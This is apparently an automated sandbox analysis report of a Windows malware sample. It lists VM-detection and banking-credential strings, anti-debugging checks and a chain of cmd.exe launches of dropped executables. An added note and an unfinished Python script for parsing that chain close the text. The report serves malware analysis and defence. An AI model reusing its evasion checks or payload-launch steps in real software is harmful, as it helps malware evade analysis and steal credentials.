Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001695000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.3236691594.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, 528307a0ac.exe, 0000000D.00000002.2717126137.00000000018BE000.00000004.00000020.00020000.00000000.sdmp, 528307a0ac.exe, 0000000D.00000002.2717126137.00000000018CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: BGIIDAEB.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: BGIIDAEB.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 528307a0ac.exe, 0000000D.00000002.2717126137.000000000185E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: BGIIDAEB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: BGIIDAEB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_04CF05E2 Start: 04CF065A End: 04CF05F6 12_2_04CF05E2
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Code function: 7_2_05170DC5 rdtsc 7_2_05170DC5
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C5A5FF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C5AC410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0032643B mov eax, dword ptr fs:[00000030h] 12_2_0032643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0032A1A2 mov eax, dword ptr fs:[00000030h] 12_2_0032A1A2
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C57B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C57B66C
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C57B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C57B1F7
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe"
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFHDHIJDGC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe"
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe "C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe"
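The "Process created" lines above show the sample's staging chain, but two of the hops go through cmd.exe, so the parent of IDGHDGIDAK.exe is recorded as cmd.exe rather than the submitted binary. The script below is an added example (it is not part of the sandbox report and not code from the sample): it parses lines in the report's own layout and unwraps the cmd.exe /c start "" "<exe>" launcher so every edge points at the binary that was actually started. The input lines are copied from the report; the line regex and the command-line tokenizer are this example's own assumptions about the format.

```python
"""Rebuild the launch chain from the report's 'Process created:' lines.

Added example; not part of the sandbox report and not the sample's code.
It parses lines in the report's own layout and unwraps the
cmd.exe /c start "" "<exe>" launcher so each edge points at the binary that
was actually started. REPORT_LINES are copied from the report; the regexes
and the tokenizer are this example's own assumptions about the line format.
"""
import re

# Copied from the report (report-format text, not constructed).
REPORT_LINES = [
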